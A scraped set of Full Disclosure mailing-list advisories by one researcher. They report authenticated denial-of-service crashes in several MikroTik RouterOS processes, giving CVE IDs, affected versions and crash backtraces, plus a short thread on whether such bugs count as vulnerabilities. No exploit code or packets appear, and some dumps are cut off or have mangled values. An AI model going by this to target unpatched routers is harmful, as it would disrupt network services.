Re: [FD] Three vulnerabilities found in MikroTik's RouterOS

2022-06-03 Thread Q C
[update 2022/05/30] Two CVEs have been assigned to these vulnerabilities.

CVE-2021-36613: Mikrotik RouterOs before stable 6.48.2 suffers from a
memory corruption vulnerability in the ptp process. An authenticated remote
attacker can cause a Denial of Service (NULL pointer dereference).

CVE-2021-36614: Mikrotik RouterOs before stable 6.48.2 suffers from a
memory corruption vulnerability in the tr069-client process. An
authenticated remote attacker can cause a Denial of Service (NULL pointer
dereference).


On Tue, Jul 6, 2021 at 19:26 Q C wrote:

> Advisory: three vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen (@cq674350529) from Codesafe Team of Legendsec at
> Qi'anxin Group
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==
> 1. reachable assertion failure
> The netwatch process suffers from an assertion failure vulnerability.
> There is a reachable assertion in the netwatch process. By sending a
> crafted packet, an authenticated remote user can crash the netwatch process
> due to assertion failure.
>
> Against stable 6.47, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: /ram/pckg/advanced-tools/nova/bin/netwatch
> 2020.06.29-14:27:25.52@0: --- signal=6
> 
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: eip=0x776b855b eflags=0x0246
> 2020.06.29-14:27:25.52@0: edi=0x esi=0x776c0200
> ebp=0x7feea6a0 esp=0x7feea698
> 2020.06.29-14:27:25.52@0: eax=0x ebx=0x00b8
> ecx=0x00b8 edx=0x0006
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: maps:
> 2020.06.29-14:27:25.52@0: 08048000-0804d000 r-xp  00:10 14
>   /ram/pckg/advanced-tools/nova/bin/netwatch
> 2020.06.29-14:27:25.52@0: 7768a000-776bf000 r-xp  00:0c 966
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.29-14:27:25.52@0: 776c3000-776dd000 r-xp  00:0c 962
>  /lib/libgcc_s.so.1
> 2020.06.29-14:27:25.52@0: 776de000-776ed000 r-xp  00:0c 945
>  /lib/libuc++.so
> 2020.06.29-14:27:25.52@0: 776ee000-7773a000 r-xp  00:0c 947
>  /lib/libumsg.so
> 2020.06.29-14:27:25.52@0: 7774-77747000 r-xp  00:0c 960
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: stack: 0x7feeb000 - 0x7feea698
> 2020.06.29-14:27:25.52@0: 00 00 6c 77 00 00 6c 77 d8 a6 ee 7f 77 40
> 6b 77 06 00 00 00 00 02 6c 77 20 00 00 00 00 00 00 00
> 2020.06.29-14:27:25.52@0: bc b0 ee 7f 38 a7 ee 7f d4 a6 ee 7f f4 aa
> 73 77 b8 a6 ee 7f f4 aa 73 77 bc b0 ee 7f ff ff ff ff
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: code: 0x776b855b
> 2020.06.29-14:27:25.52@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff
> f7 d8
>
> This vulnerability was initially found in stable 6.46.2, and it seems that
> the latest stable version 6.48.3 still suffers from this vulnerability.
>
> 2. NULL pointer dereference
> The tr069-client process suffers from a memory corruption vulnerability.
> By sending a crafted packet, an authenticated remote user can crash the
> tr069-client process due to NULL pointer dereference.
>
> Against stable 6.47, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.10-17:04:17.63@0:
> 2020.06.10-17:04:17.63@0:
> 2020.06.10-17:04:17.63@0: /ram/pckg/tr069-client/nova/bin/tr069-client
> 2020.06.10-17:04:17.63@0: --- signal=11
> 
> 2020.06.10-17:04:17.63@0:
> 2020.06.10-17:04:17.63@0: eip=0x0805a185 eflags=0x00010206
> 2020.06.10-17:04:17.63@0: edi=0x7ff74a04 esi=0x7ff74a04
> ebp=0x7ff74988 esp=0x7ff7497c
> 2020.06.10-17:04:17.63@0: eax=0x ebx=0x080a9290
> ecx=0x776924ec edx=0x7769187c
> 2020.06.10-17:04:17.63@0:
> 2020.06.10-17:04:17.63@0: maps:
> 2020.06.10-17:04:17.63@0: 08048000-08096000 r-xp  00:10 13
>   /ram/pckg/tr069-client/nova/bin/tr069-client
> 2020.06.10-17:04:17.63@0: 7762f000-77664000 r-xp  00:0c 966
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.10-17:04:17.63@0: 77668000-77682000 r-xp  00:0c 962
>  /lib/libgcc_s.so.1
> 2020.06.10-17:04:17.63@0: 77683000-77692000 r-xp  00:0c 945
>  /lib/libuc++.s

[FD] Three vulnerabilities found in MikroTik's RouterOS

2021-07-06 Thread Q C
Advisory: three vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen (@cq674350529) from Codesafe Team of Legendsec at Qi'anxin
Group


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Description of vulnerabilities
==
1. reachable assertion failure
The netwatch process suffers from an assertion failure vulnerability. There
is a reachable assertion in the netwatch process. By sending a crafted
packet, an authenticated remote user can crash the netwatch process due to
assertion failure.

Against stable 6.47, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: /ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.29-14:27:25.52@0: --- signal=6

2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: eip=0x776b855b eflags=0x0246
2020.06.29-14:27:25.52@0: edi=0x esi=0x776c0200 ebp=0x7feea6a0
esp=0x7feea698
2020.06.29-14:27:25.52@0: eax=0x ebx=0x00b8 ecx=0x00b8
edx=0x0006
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: maps:
2020.06.29-14:27:25.52@0: 08048000-0804d000 r-xp  00:10 14
/ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.29-14:27:25.52@0: 7768a000-776bf000 r-xp  00:0c 966
   /lib/libuClibc-0.9.33.2.so
2020.06.29-14:27:25.52@0: 776c3000-776dd000 r-xp  00:0c 962
   /lib/libgcc_s.so.1
2020.06.29-14:27:25.52@0: 776de000-776ed000 r-xp  00:0c 945
   /lib/libuc++.so
2020.06.29-14:27:25.52@0: 776ee000-7773a000 r-xp  00:0c 947
   /lib/libumsg.so
2020.06.29-14:27:25.52@0: 7774-77747000 r-xp  00:0c 960
   /lib/ld-uClibc-0.9.33.2.so
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: stack: 0x7feeb000 - 0x7feea698
2020.06.29-14:27:25.52@0: 00 00 6c 77 00 00 6c 77 d8 a6 ee 7f 77 40 6b
77 06 00 00 00 00 02 6c 77 20 00 00 00 00 00 00 00
2020.06.29-14:27:25.52@0: bc b0 ee 7f 38 a7 ee 7f d4 a6 ee 7f f4 aa 73
77 b8 a6 ee 7f f4 aa 73 77 bc b0 ee 7f ff ff ff ff
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: code: 0x776b855b
2020.06.29-14:27:25.52@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7
d8

This vulnerability was initially found in stable 6.46.2, and it seems that
the latest stable version 6.48.3 still suffers from this vulnerability.

2. NULL pointer dereference
The tr069-client process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
tr069-client process due to NULL pointer dereference.

Against stable 6.47, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0: /ram/pckg/tr069-client/nova/bin/tr069-client
2020.06.10-17:04:17.63@0: --- signal=11

2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0: eip=0x0805a185 eflags=0x00010206
2020.06.10-17:04:17.63@0: edi=0x7ff74a04 esi=0x7ff74a04 ebp=0x7ff74988
esp=0x7ff7497c
2020.06.10-17:04:17.63@0: eax=0x ebx=0x080a9290 ecx=0x776924ec
edx=0x7769187c
2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0: maps:
2020.06.10-17:04:17.63@0: 08048000-08096000 r-xp  00:10 13
/ram/pckg/tr069-client/nova/bin/tr069-client
2020.06.10-17:04:17.63@0: 7762f000-77664000 r-xp  00:0c 966
   /lib/libuClibc-0.9.33.2.so
2020.06.10-17:04:17.63@0: 77668000-77682000 r-xp  00:0c 962
   /lib/libgcc_s.so.1
2020.06.10-17:04:17.63@0: 77683000-77692000 r-xp  00:0c 945
   /lib/libuc++.so
2020.06.10-17:04:17.63@0: 77693000-7769d000 r-xp  00:0c 963
   /lib/libm-0.9.33.2.so
2020.06.10-17:04:17.63@0: 7769f000-776bc000 r-xp  00:0c 948
   /lib/libucrypto.so
2020.06.10-17:04:17.63@0: 776bd000-776c r-xp  00:0c 954
   /lib/libxml.so
2020.06.10-17:04:17.63@0: 776c1000-7770d000 r-xp  00:0c 947
   /lib/libumsg.so
2020.06.10-17:04:17.63@0: 7771-7771b000 r-xp  00:0c 955
   /lib/libuhttp.so
2020.06.10-17:04:17.63@0: 7771c000-77724000 r-xp  00:0c 951
   /lib/libubox.so
2020.06.10-17:04:17.63@0: 77728000-7772f000 r-xp  00:0c 960
   /lib/ld-uClibc-0.9.33.2.so
2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0: stack: 0x7ff75000 - 0x7ff7497c
2020.06.10-17:04:17.63@0: 10 a0 08 08 40 4b 72 77 90 92 0a 08 b8 49 f7
7f 7c fa 71 77 90 92 0a 08 04 4a f7 7f 05 00 00 00
2020.06.10-17:04:17.63@0: 28 4a f7 7f b4 49 f7 7f 40 4b 72 77 88 5b 09
08 40 4b 72 77 80 4d f7 7f 04 4a f7 7f 28 4a f7 7f
2020.06.10-17:04:17.63@0:

[FD] Four vulnerabilities found in MikroTik's RouterOS

2021-05-11 Thread Q C
Advisory: four vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: only CVE-2020-20227 is fixed
CVE: CVE-2020-20220, CVE-2020-20227, CVE-2020-20245, CVE-2020-20246
Credit: Qian Chen (@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Description of vulnerabilities
==
These vulnerabilities were reported to the vendor almost one year ago, and
the vendor confirmed them.

1. CVE-2020-20220
The bfd process suffers from a memory corruption vulnerability. By sending
a crafted packet, an authenticated remote user can crash the bfd process
due to invalid memory access.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: /ram/pckg/routing/nova/bin/bfd
2020.06.19-18:36:13.88@0: --- signal=11

2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: eip=0x0804b175 eflags=0x00010202
2020.06.19-18:36:13.88@0: edi=0x08054a90 esi=0x08054298 ebp=0x7f9d3e88
esp=0x7f9d3e70
2020.06.19-18:36:13.88@0: eax=0x08050634 ebx=0x7af0 ecx=0x08051274
edx=0x0001
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: maps:
2020.06.19-18:36:13.88@0: 08048000-0805 r-xp  00:1b 16
/ram/pckg/routing/nova/bin/bfd
2020.06.19-18:36:13.88@0: 7759a000-7759c000 r-xp  00:0c 959
   /lib/libdl-0.9.33.2.so
2020.06.19-18:36:13.88@0: 7759e000-775d3000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.19-18:36:13.88@0: 775d7000-775f1000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.19-18:36:13.88@0: 775f2000-77601000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.19-18:36:13.88@0: 77602000-7775f000 r-xp  00:0c 954
   /lib/libcrypto.so.1.0.0
2020.06.19-18:36:13.88@0: 7776f000-7000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.19-18:36:13.88@0: 8000-777c4000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.19-18:36:13.88@0: 777ca000-777d1000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: stack: 0x7f9d4000 - 0x7f9d3e70
2020.06.19-18:36:13.88@0: 34 06 05 08 d0 e6 04 08 d8 3e 9d 7f 90 4a 05
08 98 42 05 08 d8 3e 9d 7f f8 3e 9d 7f 6d 39 77 77
2020.06.19-18:36:13.88@0: 90 4a 05 08 28 40 9d 7f 05 00 00 00 00 43 05
08 00 00 00 00 28 90 7c 77 01 00 00 00 0c 00 00 00
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: code: 0x804b175
2020.06.19-18:36:13.88@0: ff 05 00 00 00 00 83 c4 10 c9 c3 55 89 e5 53
83

This vulnerability was initially found in long-term 6.44.6, and it seems
that the latest stable version 6.48.2 still suffers from this vulnerability.

2. CVE-2020-20227
The diskd process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the diskd
process due to invalid memory access.

Against stable 6.47, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: /nova/bin/diskd
2020.06.05-15:00:38.33@0: --- signal=11

2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: eip=0x7775a1e3 eflags=0x00010202
2020.06.05-15:00:38.33@0: edi=0x7f9dd024 esi=0x000a ebp=0x7f9dceb8
esp=0x7f9dceac
2020.06.05-15:00:38.33@0: eax=0x000a ebx=0x777624ec ecx=0x08054600
edx=0x08056e18
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: maps:
2020.06.05-15:00:38.33@0: 08048000-08052000 r-xp  00:0c 1049
/nova/bin/diskd
2020.06.05-15:00:38.33@0: 776ff000-77734000 r-xp  00:0c 966
   /lib/libuClibc-0.9.33.2.so
2020.06.05-15:00:38.33@0: 77738000-77752000 r-xp  00:0c 962
   /lib/libgcc_s.so.1
2020.06.05-15:00:38.33@0: 77753000-77762000 r-xp  00:0c 945
   /lib/libuc++.so
2020.06.05-15:00:38.33@0: 77763000-7776b000 r-xp  00:0c 951
   /lib/libubox.so
2020.06.05-15:00:38.33@0: 7776c000-777b8000 r-xp  00:0c 947
   /lib/libumsg.so
2020.06.05-15:00:38.33@0: 777be000-777c5000 r-xp  00:0c 960
   /lib/ld-uClibc-0.9.33.2.so
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: stack: 0x7f9de000 - 0x7f9dceac
2020.06.05-15:00:38.33@0: f4 8a 7b 77 0a 00 00 00 f4 8a 7b 77 e8 ce 9d
7f 92 be 78 77 f8 45 05 08 0a 00 00 00 18 6e 05 08
2020.06.05-15:00:38.33@0: 18 6e 05 08 e4 ce 9d 7f 24 d0 9d 7f 7c 18 76
77 24 d0 9d 7f 18 69 05 08 40 cf 9d 7f a8 cf 9d 7f
2020.06.05-15:00:38.34@0:
2020.06.05-15:00:38.34@0: code: 0x7775a1e3
2020.06.05-15:00:38.34@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 

Re: [FD] Three vulnerabilities found in MikroTik's RouterOS

2021-05-11 Thread Q C
Hi,

In Mikrotik RouterOs, each user is assigned to a user group, which denotes
the rights of this user. A group policy is a combination of individual
policy items, and provides a convenient way to assign different permissions
and access rights to different user classes. (Reference:
https://help.mikrotik.com/docs/display/ROS/User)

Some common individual policy items are: web, winbox, read, write, reboot
and so on. Among them, reboot is treated as a separate permission, so an
authenticated user may not have the permission to reboot the device.

As to these vulnerabilities (or software bugs?), reboot permission is not
required to trigger them, and they may impact the system services or even
reboot the system. Of course, since authentication is still necessary to
trigger them, they have a low impact.

Thanks!


On Sat, May 8, 2021 at 12:09 AM Gynvael Coldwind wrote:

> Hi,
>
> I might be missing something, but how are these considered vulnerabilities?
> My point is that these require authentication, and an already
> authenticated user already has permissions to reboot the device anyway,
> right?
>
> If the above assumption is correct, then there isn't really a security
> boundary breach, so it would be a software bug, but not a vulnerability.
> Or am I missing something?
>
> Thanks,
> Gynvael
>
> On Fri, May 7, 2021 at 5:51 PM Q C  wrote:
>
>> [update 2021/05/04] Three CVEs have been assigned to these
>> vulnerabilities.
>>
>> CVE-2020-20215: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
>> memory corruption vulnerability in the /nova/bin/diskd process. An
>> authenticated remote attacker can cause a Denial of Service due to invalid
>> memory access.
>>
>> CVE-2020-20216: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
>> memory corruption vulnerability in the /nova/bin/graphing process. An
>> authenticated remote attacker can cause a Denial of Service (NULL pointer
>> dereference).
>>
>> CVE-2020-20213: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from a
>> stack exhaustion vulnerability in the /nova/bin/net process. An
>> authenticated remote attacker can cause a Denial of Service due to
>> overloading the system's CPU.
>>
>>
>>
>> On Wed, Jul 22, 2020 at 8:11 PM Q C wrote:
>>
>> > Advisory: three vulnerabilities found in MikroTik's RouterOS
>> >
>> >
>> > Details
>> > ===
>> >
>> > Product: MikroTik's RouterOS
>> > Vendor URL: https://mikrotik.com/
>> > Vendor Status: fixed version released
>> > CVE: -
>> > Credit: Qian Chen (@cq674350529) of Qihoo 360 Nirvan Team
>> >
>> >
>> > Product Description
>> > ==
>> >
>> > RouterOS is the operating system used on MikroTik's devices, such as
>> > switches, routers and access points.
>> >
>> >
>> > Description of vulnerabilities
>> > ==
>> >
>> > 1. Memory corruption vulnerability
>> > The diskd process suffers from a memory corruption vulnerability. By
>> > sending a crafted packet, an authenticated remote user can crash the
>> diskd
>> > process due to invalid memory access.
>> >
>> > Against stable 6.44.3, the poc resulted in the following crash dump.
>> >
>> > # cat /rw/logs/backtrace.log
>> > 2020.06.04-14:18:22.55@0:
>> > 2020.06.04-14:18:22.55@0:
>> > 2020.06.04-14:18:22.55@0: /nova/bin/diskd
>> > 2020.06.04-14:18:22.55@0: --- signal=11
>> > 
>> > 2020.06.04-14:18:22.55@0:
>> > 2020.06.04-14:18:22.55@0: eip=0x776cd1db eflags=0x00010202
>> > 2020.06.04-14:18:22.55@0: edi=0x08056760 esi=0x08056790
>> > ebp=0x7fd40b78 esp=0x7fd40b6c
>> > 2020.06.04-14:18:22.55@0: eax=0x001b ebx=0x776d54ec
>> > ecx=0x776d54ec edx=0x20fe0010
>> > 2020.06.04-14:18:22.55@0:
>> > 2020.06.04-14:18:22.55@0: maps:
>> > 2020.06.04-14:18:22.55@0: 08048000-08052000 r-xp  00:0c
>> 1131
>> >   /nova/bin/diskd
>> > 2020.06.04-14:18:22.55@0: 77672000-776a7000 r-xp  00:0c 996
>> >  /lib/libuClibc-0.9.33.2.so
>> > 2020.06.04-14:18:22.55@0: 776ab000-776c5000 r-xp  00:0c 992
>> >  /lib/libgcc_s.so.1
>> > 2020.06.04-14:18:22.55@0: 776c6000-776d5000 r-xp  00:0c 976
>> >  /lib/libuc++.so
>> > 2020.06.04-14:18:22.55@0: 776d6000-776de000 r-xp  00:0c 982
>> >  /lib/libubox.so
>> > 2020.06.04-14:18:2

[FD] Four vulnerabilities found in MikroTik's RouterOS

2021-05-07 Thread Q C
Advisory: four vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: no fix yet
CVE: CVE-2020-20214, CVE-2020-20222, CVE-2020-20236, CVE-2020-20237
Credit: Qian Chen (@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Description of vulnerabilities
==
These vulnerabilities were reported to the vendor almost one year ago, and
the vendor confirmed them. However, there is still no fix for them yet.
By the way, the three vulnerabilities in the sniffer binary are different
from each other.

1. CVE-2020-20214
The btest process suffers from an assertion failure vulnerability. There is
a reachable assertion in the btest process. By sending a crafted packet, an
authenticated remote user can crash the btest process due to assertion
failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: /nova/bin/btest
2020.06.19-15:51:36.94@0: --- signal=6

2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: eip=0x7772255b eflags=0x0246
2020.06.19-15:51:36.94@0: edi=0x00fe0001 esi=0x7772a200 ebp=0x7fdcf880
esp=0x7fdcf878
2020.06.19-15:51:36.94@0: eax=0x ebx=0x010f ecx=0x010f
edx=0x0006
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: maps:
2020.06.19-15:51:36.94@0: 08048000-08057000 r-xp  00:0c 1006
/nova/bin/btest
2020.06.19-15:51:36.94@0: 776f4000-77729000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.19-15:51:36.94@0: 7772d000-77747000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.19-15:51:36.94@0: 77748000-77757000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.19-15:51:36.94@0: 77758000-5000 r-xp  00:0c 947
   /lib/libucrypto.so
2020.06.19-15:51:36.94@0: 6000-777c2000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.19-15:51:36.94@0: 777c8000-777cf000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: stack: 0x7fdd - 0x7fdcf878
2020.06.19-15:51:36.94@0: 00 a0 72 77 00 a0 72 77 b8 f8 dc 7f 77 e0 71
77 06 00 00 00 00 a2 72 77 20 00 00 00 00 00 00 00
2020.06.19-15:51:36.94@0: 16 00 00 00 18 f9 dc 7f b4 f8 dc 7f e4 2a 7c
77 01 00 00 00 e4 2a 7c 77 16 00 00 00 01 00 fe 00
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: code: 0x7772255b
2020.06.19-15:51:36.94@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7
d8

This vulnerability was initially found in long-term 6.44.5, and it seems
that the latest stable version 6.48.2 still suffers from this vulnerability.

2. CVE-2020-20222
The sniffer process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
sniffer process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: /nova/bin/sniffer
2020.06.19-16:36:18.33@0: --- signal=11

2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: eip=0x08050e33 eflags=0x00010206
2020.06.19-16:36:18.33@0: edi=0x08057a24 esi=0x7f85c094 ebp=0x7f85c0c8
esp=0x7f85c080
2020.06.19-16:36:18.33@0: eax=0x ebx=0x7f85c090 ecx=0x00ff
edx=0x08059678
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: maps:
2020.06.19-16:36:18.33@0: 08048000-08056000 r-xp  00:0c 1034
/nova/bin/sniffer
2020.06.19-16:36:18.33@0: 776ce000-77703000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.19-16:36:18.33@0: 77707000-77721000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.19-16:36:18.33@0: 77722000-77731000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.19-16:36:18.33@0: 77732000-7773a000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.19-16:36:18.33@0: 7773b000-77787000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.19-16:36:18.33@0: 7778d000-77794000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: stack: 0x7f85d000 - 0x7f85c080
2020.06.19-16:36:18.33@0: 2c 08 07 08 04 00 fe 08 fe 00 00 00 20 ad 05
08 00 0c 07 08 a0 0b 07 08 af 0b 07 08 04 7a 05 08
2020.06.19-16:36:18.33@0: 08 00 00 00 24 7a 05 08 ff 00 00 00 00 00 00
00 08 c2 85 7f e4 7a 78 77 d8 c0 85 7f e4 7a 78 77
2020.06.19-16:36:18.34@0:
2020.06.19-16:36:18.34@0: code: 0x8050e33
2020.06.19-16:36:18.34@0: 0b 48 0c 89 fa 89 d8 e8 7d f1 ff ff 50 50 53
56

This vulnerability was initially 

Re: [FD] Four vulnerabilities found in MikroTik's RouterOS

2021-05-07 Thread Q C
[Update 2021/05/05] Two CVEs have been assigned to two of these
vulnerabilities.

CVE-2020-20254: Mikrotik RouterOs before 6.47 (stable tree) suffers from a
memory corruption vulnerability in the /nova/bin/lcdstat process. An
authenticated remote attacker can cause a Denial of Service (NULL pointer
dereference).

CVE-2020-20253: Mikrotik RouterOs before 6.47 (stable tree) suffers from a
divide by zero vulnerability in the /nova/bin/lcdstat process. An
authenticated remote attacker can cause a Denial of Service due to a divide
by zero error.



On Tue, Jul 7, 2020 at 10:05 PM Q C wrote:

> Advisory: four vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: through stable 6.47
> Fixed Versions: stable 6.47
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen (@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==
>
> These four vulnerabilities were tested only against the MikroTik RouterOS
> stable release tree when found. Maybe other release trees also suffer from
> these vulnerabilities.
>
> PS: The following three memory corruption vulnerabilities are different.
>
> 1. NULL pointer dereference vulnerability
> The lcdstat process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the lcdstat
> process due to NULL pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: /nova/bin/lcdstat
> 2020.06.04-15:32:04.67@0: --- signal=11
> 
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: eip=0x0805a26e eflags=0x00010202
> 2020.06.04-15:32:04.67@0: edi=0x esi=0x7fbeaedc
> ebp=0x7fbeae18 esp=0x7fbeadf4
> 2020.06.04-15:32:04.67@0: eax=0x ebx=0x7fbeb848
> ecx=0x0807f14c edx=0x0001
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: maps:
> 2020.06.04-15:32:04.67@0: 08048000-0807e000 r-xp  00:0c 1054
>   /nova/bin/lcdstat
> 2020.06.04-15:32:04.67@0: 776fd000-77732000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-15:32:04.67@0: 77736000-7775 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-15:32:04.67@0: 77751000-7776 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-15:32:04.67@0: 77761000-77769000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.04-15:32:04.67@0: 7776a000-777b6000 r-xp  00:0c 946
>  /lib/libumsg.so
> 2020.06.04-15:32:04.67@0: 777bc000-777c3000 r-xp  00:0c 958
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: stack: 0x7fbeb000 - 0x7fbeadf4
> 2020.06.04-15:32:04.67@0: 48 b8 be 7f 18 ae be 7f 95 ab 05 08 a0 e5
> 07 08 00 00 00 00 4c f1 07 08 48 b8 be 7f dc ae be 7f
> 2020.06.04-15:32:04.67@0: 00 00 00 00 58 ae be 7f 00 ad 05 08 48 b8
> be 7f 00 00 00 00 00 00 00 00 ec 04 76 77 d8 af be 7f
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: code: 0x805a26e
> 2020.06.04-15:32:04.67@0: 8b 70 fc ff 73 78 e8 1f c0 ff ff 8b 46 10
> 83 c4
>
> 2. NULL pointer dereference vulnerability
> The lcdstat process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the lcdstat
> process due to NULL pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-15:48:13.77@0:
> 2020.06.04-15:48:13.77@0:
> 2020.06.04-15:48:13.77@0: /nova/bin/lcdstat
> 2020.06.04-15:48:13.77@0: --- signal=11
> 
> 2020.06.04-15:48:13.77@0:
> 2020.06.04-15:48:13.77@0: eip=0x080562c6 eflags=0x00010246
> 2020.06.04-15:48:13.77@0: edi=0xff00 esi=0x00ff
> ebp=0x7fd8cb48 esp=0x7fd8cb2c
> 2020.06.04-15:48:13.77@0: eax=0x ebx=0x
> ecx=0x edx=0x
> 2020.06.04-15:48:13.77@0:
> 2020.06.04-15:48:13.77@0: maps:
> 2020.06.04-15:48:13.77@0: 08048000-0807e000 r-xp  00:0c 1054
>   /nova/bin/lcdstat
